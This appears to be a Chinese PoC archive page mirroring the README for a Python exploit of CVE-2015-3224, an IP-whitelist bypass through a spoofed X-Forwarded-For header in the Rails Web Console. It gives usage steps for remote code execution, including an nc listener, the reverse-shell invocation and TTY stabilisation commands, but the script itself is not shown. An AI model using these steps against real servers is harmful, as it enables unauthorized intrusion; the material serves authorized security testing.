关联漏洞
标题:Ruby on Rails Web Console 代码注入漏洞 (CVE-2015-3224)Description:Ruby on Rails(Rails)是Rails核心团队开发维护的一套基于Ruby语言的开源Web应用框架,它是由大卫-海纳梅尔-韩森从美国37signals公司的项目管理工具Basecamp里分离出来的。Web Console是一套基于Web的用于在服务器上执行shell命令的应用程序。 Ruby on Rails中使用的Web Console中的request.rb文件存在安全漏洞,该漏洞源于程序确定客户端IP地址时没有限制使用X-Forwarded-For头。远程攻击者可通过发送特制的请求利用该
Description
Ruby on Rails Web Console Exploit (CVE-2015-3224)
介绍
# Ruby on Rails Web Console Exploit (CVE-2015-3224)
This repository contains a **Python script** to exploit an **IP whitelist bypass vulnerability** in the developer web console of **Ruby on Rails 4.0.x and 4.1.x**. The script allows for **remote code execution** on vulnerable servers.
> ⚠️ **Disclaimer**
> This script is intended for educational purposes and authorized security testing only.
> **Do not** use it on any system without explicit permission.
> The authors are **not responsible** for any misuse or damage caused by this script.
---
## 📌 Description of the Vulnerability
The web console in vulnerable versions of Ruby on Rails is intended for development purposes and should only be accessible from trusted IP addresses. However, due to improper handling of the `X-Forwarded-For` HTTP header, an attacker can **spoof their IP address** to appear as a trusted local user (e.g., `127.0.0.1` or `::1`). This bypasses the IP whitelist and **grants unauthorized access** to the web console, leading to **remote code execution**.
---
## 🚀 Features
- **Easy to Use**: Simple command-line interface.
- **Dynamic Path Discovery**: Automatically probes the target to find the dynamic console session path.
- **Two Shell Modes**:
- **Simple Shell**: A basic, non-interactive shell for quick commands.
- **Reverse TTY Shell**: A one-line command to get a fully interactive PTY reverse shell.
- **Enhanced Readability**: Color-coded output for status messages, successes, and errors.
- **Robust**: Includes error handling for network issues and failed commands.
---
## ✅ Requirements
- Python 3
- `requests` library
Install `requests`:
```bash
pip install requests
```
---
## ⚙️ Usage
1. **Clone the repository:**
```bash
git clone https://github.com/Sic4rio/CVE-2015-3224
cd <repo-directory>
```
2. **Make the script executable:**
```bash
chmod +x exploit.py
```
### Option 1: Simple Interactive Shell
This mode is useful for running quick, simple commands.
```bash
./exploit.py -t http://<TARGET_IP>:<PORT>
```
### Option 2: Full Interactive TTY (Reverse Shell)
This is the recommended mode for a stable, fully interactive shell.
#### Step 1: Start a Listener
On your local machine, open a new terminal and start a `netcat` listener.
```bash
nc -lvnp 9001
```
#### Step 2: Run the Exploit
In another terminal, run the script with the `--rev-shell` flag, providing your local IP (`lhost`) and port (`lport`).
```bash
./exploit.py -t http://<TARGET_IP>:<PORT> --rev-shell --lhost <YOUR_IP> --lport 9001
```
#### Step 3: Stabilize the Shell
A connection will arrive at your `netcat` listener. To upgrade it to a fully interactive TTY, follow these steps *in the netcat window*:
1. **Background the shell** by pressing `Ctrl+Z`.
2. **Set your local terminal to raw mode** and bring the shell to the foreground.
```bash
stty raw -echo; fg
```
Press `Enter` if the prompt doesn't reappear.
3. **Set the terminal properties** on the remote shell.
```bash
reset
export SHELL=bash
export TERM=xterm-256color
stty rows 50 cols 120
```
You now have a fully functional and stable shell!
---
## 👥 Credits
- **Original Exploit**: Eval (@0xEval)
- **The Readme.md file**: GPT
文件快照
[4.0K] /data/pocs/7f38343f7d3d910c6e18a503265e253a048536d4
├── [6.5K] exploit.py
└── [3.3K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →